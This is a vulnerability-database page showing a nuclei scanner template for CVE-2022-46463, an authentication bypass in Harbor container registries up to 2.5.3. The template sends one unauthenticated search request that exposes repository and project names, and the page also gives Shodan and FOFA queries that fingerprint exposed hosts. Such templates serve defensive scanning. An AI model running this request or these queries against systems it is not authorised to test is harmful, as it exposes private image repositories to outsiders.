Lucene search
K

Harbor <=2.5.3 - Unauthorized Access

🗓️ 16 Aug 2023 08:46:20Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 638 Views

Harbor Unauthorized Access CVE-2022-4646

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Missing Authentication for Critical Function in Linuxfoundation Harbor
17 Jan 202314:58
githubexploit
GithubExploit
Exploit for Missing Authentication for Critical Function in Linuxfoundation Harbor
21 Mar 202310:40
githubexploit
Circl
CVE-2022-46463
18 Jan 202306:02
circl
CNNVD
Harbor 访问控制错误漏洞
13 Jan 202300:00
cnnvd
CNVD
VMware Harbor Unauthorized Access Vulnerability
17 Jan 202300:00
cnvd
CVE
CVE-2022-46463
12 Jan 202300:00
cve
Cvelist
CVE-2022-46463
12 Jan 202300:00
cvelist
NVD
CVE-2022-46463
13 Jan 202300:15
nvd
OSV
BIT-HARBOR-2022-46463
6 Mar 202410:53
osv
Prion
Design/Logic Flaw
13 Jan 202300:15
prion
Rows per page
id: CVE-2022-46463

info:
  name: Harbor <=2.5.3 - Unauthorized Access
  author: Arm!tage
  severity: high
  description: |
    An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in Harbor.
  remediation: |
    Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46463
    - https://github.com/Vad1mo
    - https://github.com/lanqingaa/123/blob/main/README.md
    - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d
    - https://github.com/lanqingaa/123
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-46463
    cwe-id: CWE-306
    epss-score: 0.01473
    epss-percentile: 0.86471
    cpe: cpe:2.3:a:linuxfoundation:harbor:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: linuxfoundation
    product: harbor
    shodan-query: http.favicon.hash:657337228
    fofa-query: icon_hash=657337228
  tags: cve,cve2022,harbor,auth-bypass,exposure,linuxfoundation

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v2.0/search?q=/"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "repository_name"
          - "project_name"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220449603ddc491f4e76cd65515179856b40d8912aba200bf0340f290fec65bb797022100cac2947b49a158ecc9d280ab30085caf0d60125a2379506ab5fde6a50e0da316:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Dec 2024 13:57Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.5
EPSS0.06237
SSVC
638